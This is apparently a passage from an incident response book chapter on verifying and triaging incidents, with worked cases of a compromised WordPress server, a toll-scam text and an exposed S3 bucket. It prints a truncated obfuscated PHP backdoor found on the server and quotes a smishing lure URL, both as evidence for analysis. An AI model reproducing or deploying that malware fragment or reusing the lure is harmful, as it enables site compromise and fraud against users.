1. Verify and Triage Activities
In the DAIR model, we introduce an activity that is not specifically called out in other popular incident response models: verify and triage. This step is often implied in the detection phase of PICERL or NIST SP 800-61 (Computer Security Incident Handling Guide), but we believe it is important to explicitly call it out.
In the verify and triage activity, analysts are asked to perform two important actions:
-
Verify the incident: Use the information collected during the detect activity to assess the incident’s validity and assign an initial risk impact classification to engage the broader incident response team.
-
Triage the incident: Working with decision makers, determine appropriate response actions based on the risk impact classification and available incident information, including resource assignment to investigate the incident.
In this activity, analysts begin coordinating more actively with decision-makers: individuals with the authority to make decisions about the incident response effort. These decision makers are often managers or executives who can provide the necessary resources to respond to the incident, but may also include data owners, legal counsel, business unit leaders, or other stakeholders who have a vested interest in the outcome of the incident response process.
The Importance of Verification
During verification, we use information collected during the detect activity to determine whether the incident is real or a false positive. Verification ensures that the incident response team is not spending resources on a non-existent incident, freeing the team to focus on other responsibilities. It also helps to build decision-maker confidence by ensuring the response is appropriate for the risk as understood at the beginning of the response effort.
In some cases, verification is straightforward: a defaced website, for example, is a clear indication of compromise. In other cases, the indicators of compromise are less clear, and the incident response team may need to spend time verifying the incident before proceeding with the response effort.
At this stage of the incident response process, we often have limited insight into the incident and must rely on information collected during the detect phase to make an initial assessment. We should also accept that sometimes the verification process will not reveal evidence of a compromise, despite unexplained behavior that might suggest otherwise.
Verification Response Actions
During verification, the IRT reviews the information collected in the detect activity to determine the validity of the incident. Based on the information available, the IRT may take one of the following actions:
-
Continue the incident response process: If the IRT determines that the incident is real, they will escalate and initiate the incident response process, engaging the broader incident response team and other company stakeholders and decision-makers.
-
Stop the incident response process: If the IRT determines the incident is not real, they will close it and document the findings for future reference.
-
Defer verification: If the IRT is unable to determine the validity of the incident based on the information available, they may defer decision-making while requesting additional information from the reporting party or other sources.
The decision to continue, stop, or defer allows the analyst to make an initial assessment of the reported incident before engaging the broader incident response team, company stakeholders, and decision-makers. We include an illustration of this process in Figure 2.
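The continue/stop/defer logic can be expressed as a small helper. The sketch below is illustrative only; the enum and function names are ours, not part of DAIR or any tooling:

```python
from enum import Enum
from typing import Optional

class VerificationDecision(Enum):
    CONTINUE = "continue"  # incident verified: escalate to the broader IRT
    STOP = "stop"          # false positive: close and document the findings
    DEFER = "defer"        # inconclusive: request additional information

def verify(evidence_confirms_compromise: Optional[bool]) -> VerificationDecision:
    # None models the "unable to determine" case described above.
    if evidence_confirms_compromise is True:
        return VerificationDecision.CONTINUE
    if evidence_confirms_compromise is False:
        return VerificationDecision.STOP
    return VerificationDecision.DEFER
```

Modeling the inconclusive case explicitly (here as None) keeps deferral a first-class outcome rather than an afterthought.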
Documentation
Using the documentation platform established during the incident preparation activity for incident tracking (see Identify a Platform for Incident Tracking), the incident response analyst should capture information about the incident. This will begin an information-collection process that will continue throughout the incident’s lifecycle. Information to collect during the verification activity may include:
-
Incident identifier: A unique identifier for the incident, often generated by the incident tracking platform.
-
Incident title: A descriptive title for the incident, often based on the source of the report or the incident classification. The title serves as a quick, intuitive reference for the team when referring to the incident.
-
Handler ID: The identifier for the incident response analyst responsible for assessing the incident.
-
Incident summary: A brief description of the incident, including the source of the report, the date and time of the report, and any other relevant information.
-
Incident classification: An initial incident classification, based on the information available. Some incident classifications might be unauthorized access, phishing, malicious code, sensitive data disclosure, account compromise, public-facing exploit, and more.
-
Evidence references: References to evidence collected during the detect activity.
The documentation started during the verification activity will be used throughout the incident response process to track the incident, document response actions, and provide a record for future reference. Further, it can be used by the incident response team to provide updates to decision makers and other stakeholders as the incident response process progresses. Later, this documentation will be used to create a final incident report or as part of an organization’s cyber insurance claim.
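The fields above can be captured in a structured record. A minimal sketch, assuming a Python-based integration with the tracking platform; the field names and sample values are illustrative:

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone

@dataclass
class IncidentRecord:
    """Fields captured during verification, mirroring the list above."""
    incident_id: str           # unique identifier, often tracker-generated
    title: str                 # quick, intuitive reference for the team
    handler_id: str            # analyst responsible for the assessment
    summary: str               # source, date/time of report, other context
    classification: str        # e.g. "phishing", "malicious code"
    evidence_refs: list = field(default_factory=list)
    opened_at: datetime = field(
        default_factory=lambda: datetime.now(timezone.utc))

# Hypothetical example record
record = IncidentRecord(
    incident_id="IR-2025-0042",
    title="Suspicious PHP file on WordPress server",
    handler_id="analyst-07",
    summary="Help desk reported repeated outages; Apache logs show anomalies.",
    classification="malicious code",
    evidence_refs=["apache-access-log-excerpt"],
)
```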
At this point in the process, however, there is often a feeling of urgency to move quickly. Speed matters, but so does documenting the incident accurately, with sufficient detail to be useful for subsequent activities in the incident response process. A modern adage holds that if you are moving too fast to take notes, you are simply moving too fast. Taking the time to document the incident also helps moderate the investigation’s pace, ensuring that the team does not move so quickly that it misses important details.
Initial Risk Assessment
In Section 1.3, we examined the importance of documenting the incident during the verification activity, but we have not yet captured an initial risk assessment for the incident.
Before presenting the incident details to a decision-maker for consideration of response effort resource allocation, the incident response analyst should provide an initial risk assessment of the incident. There are many ways to classify incidents and assess their impact. Several projects are available to assist organizations with this task, including:
-
Vocabulary for Event Recording and Incident Sharing (VERIS): Used in the Verizon Data Breach Investigations Report (DBIR) and other incident sharing communities to quantify incident impact
-
Factor Analysis of Information Risk (FAIR): A risk analysis framework that helps organizations quantify and manage information risk
-
NIST SP 800-30: A US government risk assessment framework that helps organizations identify, assess, and respond to risks to their information systems
For many organizations, though, the initial risk assessment is simply a classification of the incident based on its perceived impact on the organization. This includes financial, operational, and reputational loss, as well as the potential regulatory impact. While these considerations will vary significantly among analysts within the same organization, evaluating the perceived impact allows the analyst to classify the risk into broad categories that can be used to communicate incident details to decision makers.
Many organizations classify incident risk into four levels:
-
Low: Minor security anomalies with minimal impact.
-
Medium: Potential security concerns requiring investigation but not disrupting operations.
-
High: Confirmed incidents impacting business operations or data integrity.
-
Critical: Major security incidents requiring executive escalation and immediate containment.
Adding the initial risk assessment to the incident documentation will help decision-makers understand the potential impact of the incident on the organization, based on the analyst’s assessment.
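The four levels reduce to a short decision ladder. In the sketch below, the yes/no questions are an illustrative simplification of the level definitions, not a formal methodology:

```python
def initial_risk(confirmed: bool, impacts_operations_or_data: bool,
                 requires_executive_escalation: bool) -> str:
    """Decision ladder for the four-level scheme described above."""
    if confirmed and requires_executive_escalation:
        return "critical"  # major incident needing immediate containment
    if confirmed and impacts_operations_or_data:
        return "high"      # confirmed impact on operations or data integrity
    if confirmed or impacts_operations_or_data:
        return "medium"    # potential concern requiring investigation
    return "low"           # minor anomaly with minimal impact
```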
Verification and Cyber Threat Intelligence
Cyber Threat Intelligence (CTI) provides valuable context during verification, helping analysts distinguish genuine threats from false positives and informing the risk assessment that guides triage decisions. By integrating CTI into verification workflows, organizations can make faster, more accurate determinations about whether to continue, stop, or defer incident response efforts.
EOI Validation and Enrichment
When analysts encounter suspicious Events of Interest (EOI) during verification, CTI platforms can provide additional context about whether those indicators are associated with known threats. Querying reputation databases, threat intelligence feeds, and community-sourced information provides insight that can help distinguish between confirmed malicious activity and benign behavior. This is especially important during the verification phase, where the goal is to quickly assess the validity of the incident without expending unnecessary resources.
For example, using one or more CTI sources, analysts can query intelligence databases using technical indicators such as IP addresses, domain names, URLs, or file hashes observed in the environment. The CTI database may indicate whether those indicators have been previously associated with malware distribution, phishing campaigns, command-and-control infrastructure, or other malicious activity. Platforms such as VirusTotal, AlienVault OTX, Shodan, and commercial threat intelligence feeds may even provide different perspectives on the same indicator, allowing analysts to cross-reference multiple sources to increase confidence in the assessment.
For example, in an incident engagement, the IP address 147.45.44.131 was observed as a source for PowerShell script downloads in web proxy logs. While suspicious, this is not definitive proof of malicious activity. Cross-referencing this IP address against CTI sources, including VirusTotal and AlienVault OTX, provided additional context on malicious activity patterns, as shown in Figure 3 and Figure 4.
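Conceptually, this cross-referencing can be sketched as follows. The lookup tables stand in for real CTI sources such as VirusTotal or AlienVault OTX, and their contents are invented; real platforms return far richer verdicts:

```python
# Stubbed lookup tables standing in for real CTI sources; the verdict
# strings and feed contents here are invented for illustration.
CTI_SOURCES = {
    "source_a": {"147.45.44.131": "malware distribution"},
    "source_b": {"147.45.44.131": "command-and-control"},
    "source_c": {},  # this source has no record of the indicator
}

def cross_reference(indicator: str) -> dict:
    """Collect per-source verdicts; confidence grows with corroboration."""
    verdicts = {name: feed.get(indicator) for name, feed in CTI_SOURCES.items()}
    flagged = [v for v in verdicts.values() if v is not None]
    return {
        "indicator": indicator,
        "verdicts": verdicts,
        "sources_flagging": len(flagged),
        "corroborated": len(flagged) >= 2,  # illustrative threshold
    }
```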
CTI enrichment also helps identify false positives before they consume investigation resources. Legitimate services sometimes exhibit behavior that triggers security alerts: content delivery networks with unusual traffic patterns, cloud infrastructure with dynamic IP allocation, or security tools performing authorized scanning. Threat intelligence platforms often maintain databases of known-good infrastructure that can quickly rule out false positives. For example, regularly timed outbound connections to an unfamiliar IP address might initially appear to match common command-and-control activity patterns, but CTI enrichment revealing that the IP address belongs to Microsoft’s Windows Notification Service (WNS) infrastructure can quickly close the verification loop, as shown in Figure 5 and Figure 6.
| Build a local knowledge base of false positive sources specific to the organization’s environment. When CTI enrichment identifies a benign indicator that triggered an alert, document the finding for future reference. Over time, this organizational memory reduces verification time for recurring false positives. |
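Such a knowledge base can start very small. An in-memory sketch is shown below; a real deployment would persist entries to the tracking platform or a shared file:

```python
from typing import Optional

class FalsePositiveKB:
    """Organizational memory of benign indicators that triggered alerts."""

    def __init__(self) -> None:
        self._entries: dict = {}

    def record(self, indicator: str, reason: str) -> None:
        # Capture why the indicator was judged benign, for the next analyst.
        self._entries[indicator] = reason

    def lookup(self, indicator: str) -> Optional[str]:
        # Returns the documented reason, or None if the indicator is unknown.
        return self._entries.get(indicator)
```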
Informing Initial Risk Classification
The same indicator of compromise (IOC) can represent vastly different risk levels depending on what threat intelligence reveals about its origin, associated threat actors, and typical attack patterns. Using the CTI context, analysts can better assess the initial risk classification during the verification assessment.
For example, consider how attribution context influences our understanding of risk. A phishing email with a credential harvesting link might warrant a medium classification if threat intelligence associates it with a mass-distributed commodity campaign targeting broad populations. The same indicator escalates to high or critical if CTI links it to a threat actor known for targeting similar organizations with follow-on ransomware deployment.
| The technical indicator is identical, but the threat context fundamentally changes the appropriate response. |
Threat intelligence also informs risk classification by revealing the capabilities of attackers and the typical impact. CTI sources often document the outcomes of previous campaigns attributed to specific threat actors, including average dwell times, data exfiltration volumes, and recovery costs for victim organizations. This historical context helps analysts calibrate their risk assessment against real-world consequences rather than theoretical harm.
When integrating CTI into risk classification, analysts should consider the following factors:
-
Attribution confidence: How reliably does the CTI source link this indicator to a specific threat actor or campaign?
-
Relevance to the organization: Does the threat actor target the organization’s industry, geography, or size?
-
Attacker capability: Is the threat actor associated with sophisticated, persistent attacks or opportunistic, take-what-they-can operations?
-
Typical impact: What outcomes have previous victims experienced when targeted by this threat actor?
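These factors can be folded into a simple calibration rule, mirroring the phishing example earlier, where a medium-risk commodity campaign escalates once CTI ties it to a targeted actor. In this sketch, the 0.7 confidence threshold and the one-level bump are illustrative choices, not prescriptions:

```python
RISK_LEVELS = ["low", "medium", "high", "critical"]

def cti_adjusted_risk(base_level: str, attribution_confidence: float,
                      targets_our_profile: bool, capable_actor: bool,
                      severe_prior_impact: bool) -> str:
    """Escalate the baseline one level when well-attributed intelligence
    points to a relevant, capable actor with a history of severe impact."""
    i = RISK_LEVELS.index(base_level)
    if (attribution_confidence >= 0.7 and targets_our_profile
            and capable_actor and severe_prior_impact):
        i = min(i + 1, len(RISK_LEVELS) - 1)
    return RISK_LEVELS[i]
```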
| The absence of threat intelligence does not indicate the absence of threat. Novel attacks, zero-day exploits, and emerging threat actors will not appear in CTI feeds until after initial victims have been compromised and intelligence has been collected and shared. Analysts should treat CTI as one input to verification, not the sole indicator of whether an incident is real. |
Pivoting to Related Indicators
Threat intelligence platforms often provide relationships between indicators, allowing analysts to expand their verification scope based on known associations. A single suspicious indicator may connect to additional domains, IP addresses, file hashes, or behavioral patterns associated with the same campaign or threat actor.
When CTI reveals related indicators, analysts can search for those additional IOCs across the environment to determine whether the initial finding represents an isolated event or a broader compromise. This pivoting capability transforms verification from a single-indicator assessment into a more comprehensive evaluation of potential threat presence.
For example, an analyst investigating a domain hosting a ransomware message might discover through CTI that the domain shares infrastructure with several other domains used by the same threat actor. Searching proxy logs or DNS records for those related domains could reveal additional affected users or systems that the initial detection missed, as shown in Figure 7. This expanded scope informs both the verification decision (continue vs. stop) and the subsequent scoping activity if the incident is confirmed.
CTI pivoting also helps analysts anticipate what else to look for if the incident is confirmed. Threat intelligence often documents the Tactics, Techniques, and Procedures (TTPs) associated with specific threat actors or campaigns. If the indicator under verification is attributed to a threat actor known for deploying specific persistence mechanisms or lateral movement techniques, analysts can proactively search for those TTPs during scoping rather than discovering them reactively.
| CTI pivoting is a powerful tool, but should not be relied upon as a sole means of verification. Threat actors can adapt their techniques, and new indicators may emerge that are not yet documented in CTI sources. CTI does not eliminate the need for thorough investigation and analysis during verification. |
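Mechanically, pivoting amounts to expanding the seed indicator through CTI relationships and then sweeping local telemetry for the expanded set. A minimal sketch with invented sample data:

```python
# Hypothetical CTI relationship data: domains sharing infrastructure with
# the seed indicator. All names and log entries below are invented.
RELATED_INDICATORS = {
    "evil-payments.example": ["evil-invoices.example", "evil-billing.example"],
}

PROXY_LOG = [  # (client, destination) pairs from a proxy log
    ("10.0.0.12", "evil-payments.example"),
    ("10.0.0.57", "evil-invoices.example"),
    ("10.0.0.90", "news.example"),
]

def pivot_search(seed: str) -> dict:
    """Expand the seed via CTI relations, then sweep the log for each IOC."""
    scope = [seed] + RELATED_INDICATORS.get(seed, [])
    return {ioc: [client for client, dest in PROXY_LOG if dest == ioc]
            for ioc in scope}
```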
Verification Activity Examples
The following examples illustrate where verification is an important part of the incident response process.
The Unresponsive WordPress Site
A repeating help desk ticket caught the attention of the incident response team. A WordPress server used for distributing customer documentation for a software product was repeatedly reported as down or unresponsive. System administrators rebooted the server multiple times, resolving the issues. Engineering would close the help desk ticket, unable to reproduce the performance problems after a reboot, but the system would still become unresponsive, sometimes hours or days later.
Internal reporting from a savvy help desk analyst suggested that the problem might be broader than the engineering team realized. To verify the incident, the IRT collected logging information from the Apache web server. Reviewing the log activity revealed a large number of requests for a specific PHP file in the WordPress wp-includes directory, as shown in Listing 2.
42.105.168.75 - - [30/Jun/2024:00:36:29 -0400] "GET /wp-includes/FkhDUPZ.php HTTP/1.1" 200 65046892 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
42.105.168.75 - - [30/Jun/2024:00:36:29 -0400] "GET /wp-includes/FkhDUPZ.php HTTP/1.1" 200 65046886 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
42.105.168.75 - - [30/Jun/2024:00:36:29 -0400] "GET /wp-includes/FkhDUPZ.php HTTP/1.1" 200 65046884 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
42.105.168.75 - - [30/Jun/2024:00:36:29 -0400] "GET /wp-includes/FkhDUPZ.php HTTP/1.1" 200 65046886 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" (1)
| 1 | Multiple requests for the FkhDUPZ.php file in the WordPress wp-includes directory return large HTTP response sizes. |
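Anomalies like those in Listing 2 can be surfaced by tallying requested paths across the access log. A minimal sketch; the regex and sample lines are simplified stand-ins for real combined-format log entries:

```python
import re
from collections import Counter

# Simplified stand-ins for combined-format access log lines.
SAMPLE_LOGS = [
    '42.105.168.75 - - [30/Jun/2024:00:36:29 -0400] "GET /wp-includes/FkhDUPZ.php HTTP/1.1" 200 65046892',
    '42.105.168.75 - - [30/Jun/2024:00:36:29 -0400] "GET /wp-includes/FkhDUPZ.php HTTP/1.1" 200 65046886',
    '203.0.113.9 - - [30/Jun/2024:00:40:02 -0400] "GET /index.php HTTP/1.1" 200 5120',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP')

def top_paths(lines):
    """Tally requested paths so unusually frequent targets stand out."""
    return Counter(m.group(1) for line in lines
                   if (m := REQUEST.search(line))).most_common()
```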
By itself, this was not enough to verify that this was an incident, though the engineering team could not explain the purpose of the strangely named FkhDUPZ.php file in the WordPress wp-includes directory.
Inspecting the contents of the file revealed the PHP file source code, as shown in Listing 3.
intel-nyc1-01:~$ cat /var/www/html/wp-includes/FkhDUPZ.php
<?php $b6bb6=explode("1l","stsixe_yek_yarra1lcexe_lruc1ltilps_gerp1ldomhc1lstegf1lteg_ini1lemitotrts1lecalper_gerp1lrid_
pmet_teg_sys1lnepof1lstsixe_elif1lsoprts1lknilnu1lemitmelif1ldro1lstsixe_noitcnuf1lmirt1lpeelsu1lemaner1lezilairesnu1lel
if_5dm1lesolc_lruc1ltes_ini1lrhc1lesolcf1lyarra_ni1ltcartxe1ltimil_emit_tes1lhctam_gerp1ltroba_resu_erongi1lpeels1lehcac
tatsraelc1lhcuot1ltpotes_lruc1lrtsbus1letirwf1lnelrts1lfoef1lezilaires1llru_esrap1lelbatirw_si1l5dm1lstnetnoc_teg_elif1l
emitorcim1lecalper_rts1ltini_lruc1lelif_si");foreach($b6bb6 as$b66bb6666=>$b6bbb6){$b6bbb6=preg_split("//",$b6bbb6,-1,PR
EG_SPLIT_NO_EMPTY);$b6bb6[$b66bb6666]=implode("",array_reverse($b6bbb6));};$b66666b=__FILE__;$bb66b=explode("9","b6bbbbb
69b6bb6bbb9bbbbbb9b69b6bb66b9b66bb6b69bb6bbb69b6666b6b9bbbb6b669b6bbb6b69bbb6bbb9bb9b6b66b669bb69bb669bbbb6b9bb6b6bbb9b6
bbbbb6b9bb666666b9b66bbb9bb66bb6669bbb6b6b69b6bb6b69bb6b6b69bb6b69b6b9b666b9bbb6bb9bbbb69bbb669bbb6b6669b6bbb9bbb6bb6bb9
bbbbbb69bbbb9bb66669b6b6bb9bbbb6bb9bbb6b69bb66bbb669b6b6bb69b6bb669bb66b66b9b6b66b6b69bbbb6b6b9b66bb6b9b66666");foreach(
$bb66b as$b6666b66=>$bbb6bbb6){$$bbb6bbb6=$b6bb6[$b6666b66];}; … (1)
| 1 | Obfuscated PHP code (truncated). |
Recognizing the PHP script contained obfuscated code, the incident response team confirmed the report as an incident, escalating the event to involve the broader incident response team and other company stakeholders and decision-makers.
| Undesirable system activity, such as high CPU utilization, unexpected storage consumption, or unexplained instability, is not always an indicator of compromise, but it should be investigated to identify the root cause. |
In this case, the incident response team verified the incident by examining the Apache web server logs to identify anomalies, including frequent requests to the FkhDUPZ.php file, unusually large HTTP response sizes for those requests, and the obfuscated contents of the suspicious PHP file.
The Unpaid Toll
An accounts payable clerk forwarded a suspicious text message he received to the incident response team, as shown in Figure 8.
Rhode island turnpike(RITBA): This is a final reminder regarding the unpaid toll from your trip. A $15 daily overdue fee will be applied if it is not settled today. https://google.com/amp/rhodeislandturnpike.com
Upon initial investigation, the IRT learned that the URL in the text message redirected to rhodeislandturnpike.com, which in turn redirected to a longer URL, as shown in Figure 9.
While the site had a semi-professional appearance that matched other Rhode Island government websites, the IRT suspected this was a phishing attempt. Using threat intelligence resources, the analyst learned that the rhodeislandturnpike.com domain had been registered that day, as shown in Listing 4. Further, the website server certificate was also created that day, as shown in Listing 5.
$ date -u
Sun Feb 16 20:11:32 UTC 2025
$ whois -i rhodeislandturnpike.com | grep -i 'creation date'
Creation Date: 2025-02-16T06:37:27Z (1)
| 1 | Domain registration for rhodeislandturnpike.com was created less than fourteen hours prior. |
$ date -u
Sun Feb 16 20:13:31 UTC 2025
$ curl -svX HEAD https://rhodeislandturnpike.com/ 2>&1 | grep -A6 "Server certificate"
* Server certificate:
*  subject: CN=rhodeislandturnpike.com
*  start date: Feb 16 06:01:28 2025 GMT (1)
*  expire date: May 17 06:01:27 2025 GMT
*  subjectAltName: host "rhodeislandturnpike.com" matched cert’s "rhodeislandturnpike.com"
*  issuer: C=US; O=Let’s Encrypt; CN=E5
*  SSL certificate verify ok.
| 1 | The server TLS certificate was created approximately fourteen hours prior. |
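The domain-age check from Listing 4 is easy to automate. A minimal sketch using the WHOIS creation timestamp from the listing; the 72-hour threshold is an illustrative heuristic, not a standard:

```python
from datetime import datetime, timezone

def domain_age_hours(creation_iso: str, now: datetime) -> float:
    """Hours elapsed since a WHOIS ISO 8601 creation timestamp."""
    created = datetime.fromisoformat(creation_iso.replace("Z", "+00:00"))
    return (now - created).total_seconds() / 3600

# Values taken from Listing 4; a very recent registration is a common
# phishing heuristic, and the 72-hour threshold here is illustrative.
now = datetime(2025, 2, 16, 20, 11, 32, tzinfo=timezone.utc)
age = domain_age_hours("2025-02-16T06:37:27Z", now)
recently_registered = age < 72
```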
In their conversation, the accounts payable clerk indicated that he did not follow the SMS link and did not visit the "Rhode Island Turnpike" website. The phone’s browser history confirmed this account. Further, the analyst found no other evidence of web activity to rhodeislandturnpike.com in the company’s web proxy server activity logs.
After conferring with another analyst on the IRT, the incident was classified as an Indicator of Attack (IOA), but not as an Event of Interest (EOI) warranting further investigation. The IRT added the rhodeislandturnpike.com domain name and the server IP address to the threat intelligence platform for monitoring, and the incident was closed.
| An indicator of an attack may not always qualify as an event of interest warranting additional investigation. For many organizations, the verification process is an opportunity to limit the number of incidents that require further investigation and to focus on those most likely to have a significant impact on the organization. |
The Simple, Secure Storage Bucket
An analyst on the incident response team received a report concerning the disclosure of a vulnerable Amazon Simple Storage Service (S3) bucket. The report was from an unknown source, a self-identified bug bounty hunter, indicating that they found a high-risk vulnerability in the ssptmsdata S3 bucket. The bug bounty hunter wanted to know the organization’s policy on rewarding bug bounty hunters for their work.
The company analyst reviewed the report and identified that the ssptmsdata bucket was indeed used by one of the company’s AWS accounts. Using the AWS Command Line Interface, she reviewed the bucket’s security settings, as shown in Listing 6.
$ aws s3api get-bucket-policy --bucket ssptmsdata | jq '.Policy | fromjson'
{
"Version": "2012-10-17",
"Id": "ssptmsdata-Policy",
"Statement": [
{
"Sid": "AllowPublicRead",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"s3:Get*", (1)
"s3:List*" (2)
],
"Resource": [
"arn:aws:s3:::ssptmsdata",
"arn:aws:s3:::ssptmsdata/*"
]
}
]
}
| 1 | The bucket policy allows any AWS principal to apply S3 get actions, including GetObject, GetBucketLocation, GetBucketPolicy, and more. |
| 2 | The bucket policy allows any AWS principal to apply S3 list actions, including ListObjects, ListBucketAnalyticsConfigurations, and more. |
Reviewing the policy details, the analyst confirmed that the bucket policy allowed any AWS principal to apply S3 get and list actions to the bucket and its contents. This allowed any AWS account (from any organization) to list the files in the bucket and retrieve the contents of any file. However, she also knew that this bucket was used for public data sharing, including company website resources, the distribution of images, CSS, fonts, JavaScript files, and other related data.
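A review like this can be partially automated. The sketch below flags Allow statements that grant s3:Get* or s3:List* actions to any principal; it is a simplified check that ignores Condition blocks, NotPrincipal, object ACLs, and account-level Block Public Access settings:

```python
def is_publicly_readable(policy: dict) -> bool:
    """Flag Allow statements granting s3:Get*/s3:List* to any principal."""
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        wildcard = principal == "*" or (
            isinstance(principal, dict) and principal.get("AWS") == "*")
        if not wildcard:
            continue
        actions = stmt.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        if any(a.lower().startswith(("s3:get", "s3:list", "s3:*"))
               for a in actions):
            return True
    return False

# The bucket policy from Listing 6, expressed as a Python dict.
listing6_policy = {
    "Version": "2012-10-17",
    "Id": "ssptmsdata-Policy",
    "Statement": [{
        "Sid": "AllowPublicRead",
        "Effect": "Allow",
        "Principal": {"AWS": "*"},
        "Action": ["s3:Get*", "s3:List*"],
        "Resource": ["arn:aws:s3:::ssptmsdata", "arn:aws:s3:::ssptmsdata/*"],
    }],
}
```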
To determine whether this required action by the incident response team, the analyst reviewed the contents of the bucket, as shown in Listing 7.
$ aws s3 ls s3://ssptmsdata
PRE css/
PRE dist/
PRE fonts/
PRE images/
PRE js-lib/
PRE js/
PRE pdf/
PRE uat/
$ aws s3 ls s3://ssptmsdata/uat/
2025-02-14 14:56:41 112537 acceptance_summary.pdf
2024-05-12 11:03:12 2520 config.json
2025-02-05 11:20:15 19264 cross_browser_test.xlsx
2024-11-15 09:12:45 5515 database_seed.sql
2025-01-03 14:22:01 6472 error_log.log
2024-10-12 12:01:42 15036 feature_toggle.yaml
2024-12-15 08:45:33 22491 integration_test.py
2025-01-25 10:05:35 17055 mobile_test_cases.docx
2025-02-10 12:40:03 14491 performance_metrics.csv
2024-11-23 17:05:19 12848 performance_report.txt
2024-09-20 11:45:50 30059 sample_api_response.json
2024-12-01 10:03:58 40927 sample_users.csv
2025-01-15 13:35:22 24037 security_audit.txt
2024-10-05 15:27:35 19957 test_case.docx
2024-06-17 14:22:10 17103 test_script.sh
2024-11-03 16:30:11 1987 uat.env
2024-09-01 10:10:31 10295 uat_deploy.sh
2024-09-15 08:33:25 9087 uat_log.txt
2025-01-20 09:50:38 26982 ui_mockup.png
2024-07-20 09:15:05 41033 user_data_sample.csv
The S3 bucket contained several folders that appeared to be related to public website resources, as well as a pdf folder and a uat (User Acceptance Testing) folder.
The analyst reviewed the contents of the pdf folder and found that it contained public documentation, and the uat folder contained documentation, test data, and sample configuration data for several products.
What remained unclear was whether the bucket configuration and the data met the organization’s business needs. Was the intention to share this data publicly, or was this a misconfiguration? Were any of the files in the bucket sensitive, or was the data intended for public use?
The analyst reached out to the AWS account holder of the ssptmsdata bucket to confirm its purpose and contents. She advised that the team responsible for this asset review each file contained in the bucket and determine whether sensitive data was disclosed. She insisted that the review was urgent, asking the account owner to return his analysis by the end of the day. Once that review was complete, she could determine whether the bucket configuration and information disclosure warranted further investigation by the incident response team.
| During verification, analysts use available information to assess threats and risks to the organization. Analysts apply insight into the potential incident, an understanding of the organization’s policies and procedures, and familiarity with the policies created and reviewed during the preparation activity to determine the appropriate response. In some cases, additional information will be required, necessitating the team deferring the verification decision to a later date. |
Triage Activity
In the triage activity, analysts work with decision-makers to determine appropriate response actions based on the risk impact classification and the incident information available. This may include assigning resources to investigate the incident, engaging legal counsel, or notifying law enforcement, depending on its severity.
Few organizations would claim that they have more resources than they need for their incident response function. For most organizations, incident response is a cost center: unlike a profit center that generates revenue, it will always be scrutinized for the resources it consumes. During triage, the incident response analyst provides decision-makers with sufficient insight to determine appropriate response actions based on the risk impact classification and the incident information available following the verify activity.
In medicine, triage is the process of determining the priority of patients' treatments based on the severity of their condition. Broadly speaking, patients with high-severity conditions are prioritized over those with less severe conditions. In incident response, a similar concept applies: threats should be prioritized based on organizational policies, often using the potential negative impact on the organization as a guide.
Presenting the Incident
As technical analysts, responders are responsible for helping decision-makers understand the incident and its potential impact on the organization. Using the insights gained from the verification activity and the initial risk assessment, the analyst’s explanation of the incident significantly influences how the risk is triaged and which response actions are taken.
When presenting the incident to decision makers, analysts should consider the following:
-
Be clear and concise: Use plain language to explain the incident and the potential impact on the organization.
-
Provide context: Explain the incident in the context of the organization’s policies and procedures, and the potential impact on the organization’s operations.
-
Offer recommendations: Provide response actions based on the risk impact classification and available incident information.
-
Be prepared to answer questions: Decision-makers may have questions about the incident, the potential impact on the organization, and the recommended response actions.
The decision maker should consider the organization’s overall needs, other demands on the incident response team, the team’s well-being, and the potential impact of the incident on the organization. While the incident response analyst provides insight into the incident, the decision-maker is ultimately responsible for determining appropriate response actions and allocating resources to the response effort based on the organization’s overall needs.
Open communication between the incident response team and decision-makers is established during the preparation activity. See the sidebar Building Management Support for Policy Development for insight on how to build management support for the incident response process.
Triage Example: The Third-Party Vendor Breach
The IRT verifies that a third-party SaaS vendor used for customer relationship management has suffered a data breach. The vendor notified the organization that customer contact information (names, email addresses, phone numbers) for approximately 45,000 customers may have been compromised. The analyst classifies this as high-risk due to potential regulatory notification requirements under GDPR and state privacy laws.
The analyst presents the incident to the VP of Legal (decision maker), explaining:
-
The vendor has not provided complete details about the scope of the breach.
-
Regulatory notification timelines may apply (seventy-two hours for GDPR).
-
The organization’s legal obligation to notify customers depends on what data was actually compromised.
-
The incident requires coordination between Legal, Marketing, and the IRT.
The decision maker determines that the response requires:
-
Immediate engagement with external legal counsel specializing in privacy law.
-
Assignment of one IRT analyst to coordinate with the vendor and document their responses.
-
Daily status meetings with Legal, Marketing, and executive leadership.
-
Preparation of customer notification templates while awaiting vendor confirmation of scope.
The VP of Legal allocates budget for external counsel and authorizes the IRT analyst to dedicate full-time effort to vendor coordination for the next week. She establishes a daily 30-minute status call with the cross-functional team to ensure all stakeholders remain informed as details emerge from the vendor. The incident response analyst’s role shifts from technical investigation to coordination and documentation support, working directly with Legal to ensure the organization meets its regulatory obligations.
| When presenting incidents involving third parties to decision makers, analysts should be prepared to explain how external dependencies affect resource allocation and response timelines. The analyst’s role may shift from technical investigation to coordination support, particularly when regulatory requirements or legal considerations drive the response effort. Decision-makers need to understand not only the technical details of the incident but also the organizational and legal context to make informed resource-allocation decisions. |
Verify and Triage: Step-by-Step
The following steps provide a condensed reference for verification and triage activities. Each step corresponds to topics covered earlier in this chapter, organized for use when validating a potential incident, assessing risk, and working with decision makers to determine response priorities.
| A standalone version of this step-by-step guide is available for download on the companion website in PDF and Markdown formats. |
-
Document the incident details using the incident tracking platform established during preparation:
-
Incident identifier
-
Title
-
Handler ID
-
Summary
-
Classification
-
Evidence references
-
-
Enrich Events of Interest (EOI) with cyber threat intelligence:
-
